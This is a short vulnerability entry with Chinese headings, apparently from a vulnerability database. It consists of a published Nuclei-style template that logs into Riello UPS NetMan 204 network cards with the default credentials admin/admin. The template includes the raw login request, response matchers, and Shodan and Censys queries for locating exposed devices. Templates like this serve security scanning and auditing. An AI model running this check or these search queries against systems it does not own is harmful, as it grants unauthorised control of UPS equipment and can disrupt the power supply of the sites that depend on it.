漏洞描述
Default logins on Riello UPS NetMan 204 is used. Attacker can access to UPS and attacker can manipulate the UPS settings to disrupt the onsite systems.
netman-default-login: Riello UPS NetMan 204 Network Card - Default Login
PoC代码[已公开]
id: netman-default-login
info:
name: Riello UPS NetMan 204 Network Card - Default Login
author: mabdullah22
severity: high
description: |
Default logins on Riello UPS NetMan 204 is used. Attacker can access to UPS and attacker can manipulate the UPS settings to disrupt the onsite systems.
reference:
- https://www.riello-ups.com/
classification:
cpe: cpe:2.3:o:riello-ups:netman_204_firmware:*:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: riello-ups
product: netman_204_firmware
shodan-query: title:"Netman"
censys-query: services.http.response.body:"Netman204"
tags: default-login,netman,vuln
http:
- raw:
- |
GET /cgi-bin/login.cgi?username={{username}}&password={{password}} HTTP/1.1
Host: {{Hostname}}
attack: pitchfork
payloads:
username:
- admin
password:
- admin
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"response": "ok",'
- '"message": "Welcome."'
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100cc8e480293dafb7e253da4c30c50764956c03dc639ee14f9c20ebf75b1d647d402204e396cbe3ece7973e872464eb290730622606b6e0a74b7c2c37853fdebb6a9ff:922c64590222798bb761d5b6d8e72950